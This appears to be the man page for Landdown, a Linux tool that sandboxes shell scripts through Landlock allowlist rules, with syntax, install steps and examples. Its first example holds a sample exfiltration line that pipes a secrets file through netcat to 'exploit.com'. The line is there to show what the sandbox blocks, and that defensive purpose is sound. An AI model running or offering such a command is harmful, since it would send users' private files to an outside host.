landdown

Simple Sandboxing for shell scripts.
landdown.1 (2101B)
      1 .TH "landdown" 1 2026-06-30
      2 
      3 .SH NAME
      4 
      5 Landdown - Simple shell script sandbox
      6 
      7 .SH DESCRIPTION
      8 
      9 .PP
     10 Landdown is an easy-to-use utility for Linux that allows you to
     11 sandbox shell scripts with Landlock. Just like Landlock, Landdown
     12 "aims to protect you against the security impacts of bugs or
     13 unexpected/malicious behavior". To use, prepend your script with the
     14 landdown shebang and a ruleset, and then write your shell script like
     15 you would normally. For example:
     16 
     17 .EX
     18 #!/usr/bin/env landdown
     19 ro /bin 
     20 ro /lib
     21 #!/bin/sh
     22 # Following works
     23 echo "Hi"
     24 # Following fails
     25 cat $HOME/my-secrets | nc exploit.com 1337
     26 .EE
     27 
     28 .PP
     29 Landdown locks down file and network access of a script based on rules
     30 explicitly listed in the allowlist.
     31 
     32 
     33 .SH SUPPORTED RULES
     34 
     35 .EX
     36 rof <file>
     37 rwf <file>
     38 ro <dir>
     39 rw <dir>
     40 bind <port>
     41 connect <port>
     42 .EE
     43 
     44 .PP
     45 Each rule can be used zero or more times.
     46 
     47 .PP
     48 The syntax is
     49 
     50 .EX
     51 #!/usr/bin/env landdown
     52 <rules...>
     53 #!<interpreter>
     54 <script content...>
     55 .EE
     56 
     57 .SH INSTALL
     58 
     59 .EX
     60 go install git.sr.ht/~marcc/landdown@latest
     61 .EE
     62 
     63 .PP
     64 Arch Linux <https://aur.archlinux.org/packages/landdown-git>
     65 
     66 .SH EXAMPLES
     67 
     68 .SS Access a file
     69 .PP
     70 Write the following script
     71 
     72 .EX
     73 #!/usr/bin/env landdown
     74 ro /bin 
     75 ro /lib
     76 rwf /tmp/some-file.txt
     77 #!/bin/sh
     78 echo "Edit" > /tmp/some-file.txt
     79 .EE
     80 
     81 .PP
     82 Try removing rwf /tmp/some-file.txt and the script should fail.
     83 
     84 .PP
     85 Note: the file need to exist in order for landdown to work, run touch
     86 /tmp/some-file.txt to test.
     87 
     88 .SS Network access
     89 .PP
     90 Write the following script
     91 
     92 .EX
     93 #!/usr/bin/env landdown
     94 ro /bin 
     95 ro /lib 
     96 ro /etc/ssl
     97 rof /etc/resolv.conf
     98 connect 443
     99 #!/bin/bash
    100 curl https://www.google.com
    101 .EE
    102 
    103 .PP
    104 Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443
    105 and it should fail. Network access needs to be explicitly set.
    106 
    107 .SH CONTRIBUTIONS
    108 
    109 Contributions are welcome. Please send them to my public
    110 inbox <~marcc/public-inbox@lists.sr.ht>
    111 
    112 .SH SEE ALSO
    113 
    114 .PP
    115 \fBsh\fR(1) - section on ulimit
    116 
    117 .PP
    118 Good Practices <https://docs.kernel.org/userspace-api/landlock.html#good-practices>
    119 
    120 .SS Alternatives
    121 
    122 \fBbubblewrap\fR(1)
    123 \fBfirejail\fR(1)
    124 \fBlandrun\fR(1)